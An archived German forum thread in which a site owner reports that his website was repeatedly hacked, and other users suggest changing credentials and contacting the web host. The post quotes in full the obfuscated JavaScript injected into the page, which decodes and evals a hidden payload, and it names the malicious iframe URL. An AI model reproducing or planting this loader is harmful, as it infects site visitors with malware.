PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : !Sehr dringend: Virus auf eigener Seite!


BigRob
2011-06-04, 11:21:09
Ich hoffe mir kann jemand helfen.

Ich habe vor einiger Zeit eine Internetseite (www.boehlenfvv.de) überarbeitet - trotzdem ist sie nicht schön... aber egal.

Das Problem ist folgendes:

Seit dieser Woche ist die Seite von irgendjemanden umgeschrieben wurden, so dass ein fremder Link (http://penavare.com/apn/dtyubryox.php?n=di275) in einem iframe darauf ist. Dies wird per script eingefügt. Außerdem kommen Virenmeldung.

Das sript:

<!-- ad --><script>var el,ar,ar2,pos,yes=false;setInterval(function(){if(yes){try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="}7<)oN[ pn,\".me:if?l aE;gh/dr=sAu]w{BTC(xv'50byt12c>";ar2="R28c0c36c4c12c76c-48c-92c184c-72c-76c4c-20c152c-140c48c-40c132c-100c-12c-20c-4c4c-20c152c-68c24c40c-36c-64c12c-76c64c-32c4c100c12c12c-164c92c76c-16c-156c12c152c-44c-120c128c-112c0c0c36c4c44c-28c-32c4c56c44c-144c80c-64c0c-28c80c-24c20c44c-64c24c60c-112c0c0c80c-92c184c-72c-76c4c-20c152c-140c88c-24c-48c124c-132c100c-112c-36c56c4c44c-28c-32c4c24c40c-8c88c-84c52c-68c88c0c-156c28c44c0c-72c24c-20c48c80c-80c28c-56c-8c152c-184c36c52c-20c-52c4c68c4c80c-4c-56c52c-68c72c-168c144c-112c-16c68c-68c40c-36c80c-8c-44c132c-192c168c-4c-88c56c-72c44c80c-88c16c52c24c-16c-8c-88c20c-44c8c32c4c88c-72c52c24c-16c-8c-88c40c68c-4c-108c-20c60c52c-4c-100c56c-56c116c-116c12c-12c124c-4c-124c40c-36c44c0c-52c-20c56c-60c-16c104c-56c124c-124c-48c20c24c24c96c-60c-104c60c52c60c-132c36c-16c-20c12c120c-128c116c-84c96c-172c16c28c116c-84c76c36c-196c96c-40c4c44c-28c-32c4c148c-160c-32c80c-64c0c-28c28c0c40c60c-92c164c-12c-124c-48c20c44c-16c4c44c-28c-32c4c56c44c-144c128c-112c0c0c136c-80c28c-32c-12c12c36c-36c28c-92c184c-72c-76c4c-20c152c-140c152c-88c-56c28c104c-132c32c-12c-20c-4c4c-20c152c-32c12c-104c4c44c-28c-32c4c112c-156c80c-24c-20c72c-64c132c-64c64c0c-76c-48c116c-52c60c-132c100c12c-48c-8c88c-32c-128c128c-68c88c0c-156c28c44c0c-72c24c-20c48c80c-80c28c-56c-8c152c-184c36c52c-20c-52c4c68c4c80c-4c-56c52c-68c72c-168c144c-112c-16c68c-68c40c-36c80c-8c-44c132c-192c168c-4c-156c80c-24c-20c72c68c-4c-108c-20c-8c116c-100c56c-56c116c-116c12c-12c124c-4c-68c52c-68c-36c44c0c-52c-20c132c-76c-24c-20c72c68c-4c-108c-20c-8c-16c-16c104c-56c124c-124c-48c20c80c52c-84c96c-60c-104c60c52c60c-132c112c-76c-24c-20c72c68c-4c-108c-20c-8c28c-20c12c120c-72c52c8c-8c-76c-24c-20c72c68c-4c-108c-20c-8c140c-172c16c84c52c8c-8c-76c-24c-20c72c-64c132c-64c64c0c-76c-48c116c-52c60c-132c100c12c-32c-72c44c80c-88c68c-128c128c24c-16c-8c-156c80c-24c-20c72c-64c132c-64c64c0c-76c-48c116c-52c60c-132c100c12c-68c-44c8c32c4c88c-20c-128c128c24c-16c-8c-156c80c-64c0c0c80c-92c184c-72c-76c4c-20c152c-140c48c-40c132c-100c-12c-20c-4c4c-20c152c-68c24c40c-36c-64c12c-76c64c-32c4c100c12c12c-164c92c76c-16c-156c12c152c-44c-84c36c-52c0c24c-20c72c44c-52c-36c12c32c48c-88c-56c80c-64c0c-28]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2.replace(/c/g,","));s="";pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');}
e(s);yes=false;}},20);setTimeout(function(){el=document.createElement("div");el.innerHTML="ReferenceErr";yes=true;},1);</script><!-- /ad -->



Hab die Seite schon wieder hergestellt, aber nach einem Tag war sie schon wieder gehackt.

Was kann man da machen?

sei laut
2011-06-04, 11:35:00
Die Sicherheitslücke stopfen. Wenn du nur Webspace gemietet hast, deinen Webspaceanbieter anrufen/anschreiben und ihm das melden. Der muss das regeln.
Wenn du einen eigenen Server hast, brauchs mehr Informationen.

Edit: Oh, 1&1 - da kanns sein, dass du etwas hartknäckiger sein musst.

PatkIllA
2011-06-04, 11:45:12
Zugangsdaten geändert?

frix
2011-06-04, 12:54:35
sowas ähnliches hatte ich auch mal!

Nachdem ich die zugangsdaten geändert habe und das schadhafte stück code gelöscht habe wars wieder in ordnung.
Am bestgen die zugangsdaten von einem anderen rechner aus ändern und den eigenen gründlich durchchecken.

BigRob
2011-06-05, 10:20:10
Danke erstmal für die Antworten.

Habe die Zugangsdaten geändert und hoffe, damit hat es sich erledigt.